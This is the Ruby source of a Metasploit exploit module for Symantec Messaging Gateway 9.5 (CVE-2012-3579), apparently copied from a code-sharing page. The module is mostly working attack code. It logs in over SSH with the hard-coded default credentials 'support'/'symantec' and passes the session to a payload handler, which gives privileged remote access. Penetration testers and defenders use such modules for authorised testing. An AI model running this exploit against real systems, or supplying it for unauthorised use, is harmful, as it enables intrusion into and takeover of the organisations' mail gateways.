Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::SSH
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability',
19
        'Description' => %q{
20
          This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
21
          The 'support' user has a known default password, which can be used to login to the
22
          SSH service, and gain privileged access from remote.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'Stefan Viehbock', # Original discovery
27
          'Ben Williams',    # Reporting the vuln + coordinated release
28
          'sinn3r'           # Metasploit
29
        ],
30
        'References' => [
31
          ['CVE', '2012-3579'],
32
          ['OSVDB', '85028'],
33
          ['BID', '55143'],
34
          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
35
        ],
36
        'DefaultOptions' => {
37
          'EXITFUNC' => 'thread'
38
        },
39
        'Payload' => {
40
          'Compat' => {
41
            'PayloadType' => 'cmd_interact',
42
            'ConnectionType' => 'find'
43
          }
44
        },
45
        'Platform' => 'unix',
46
        'Arch' => ARCH_CMD,
47
        'Targets' => [
48
          ['Symantec Messaging Gateway 9.5', {}],
49
        ],
50
        'Privileged' => true,
51
        # Timestamp on Symantec advisory
52
        # But was found on Jun 26, 2012
53
        'DisclosureDate' => '2012-08-27',
54
        'DefaultTarget' => 0,
55
        'Notes' => {
56
          'Stability' => [CRASH_SAFE],
57
          'Reliability' => [REPEATABLE_SESSION],
58
          'SideEffects' => []
59
        }
60
      )
61
    )
62

63
    register_options([
64
      Opt::RPORT(22)
65
    ])
66

67
    register_advanced_options([
68
      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
69
      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
70
    ])
71
  end
72

73
  def do_login(user, pass)
74
    opts = ssh_client_defaults.merge({
75
      auth_methods: ['password', 'keyboard-interactive'],
76
      port: rport,
77
      password: pass
78
    })
79

80
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
81

82
    begin
83
      ssh = nil
84
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
85
        ssh = Net::SSH.start(rhost, user, opts)
86
      end
87
    rescue Rex::ConnectionError
88
      return
89
    rescue Net::SSH::Disconnect, ::EOFError
90
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
91
      return
92
    rescue ::Timeout::Error
93
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
94
      return
95
    rescue Net::SSH::AuthenticationFailed
96
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
97
    rescue Net::SSH::Exception => e
98
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
99
      return
100
    end
101

102
    if ssh
103
      conn = Net::SSH::CommandStream.new(ssh)
104
      ssh = nil
105
      return conn
106
    end
107

108
    return nil
109
  end
110

111
  def exploit
112
    user = 'support'
113
    pass = 'symantec'
114

115
    print_status("#{rhost}:#{rport} - Attempt to login...")
116
    conn = do_login(user, pass)
117
    if conn
118
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
119
      handler(conn.lsock)
120
    end
121
  end
122
end
123

124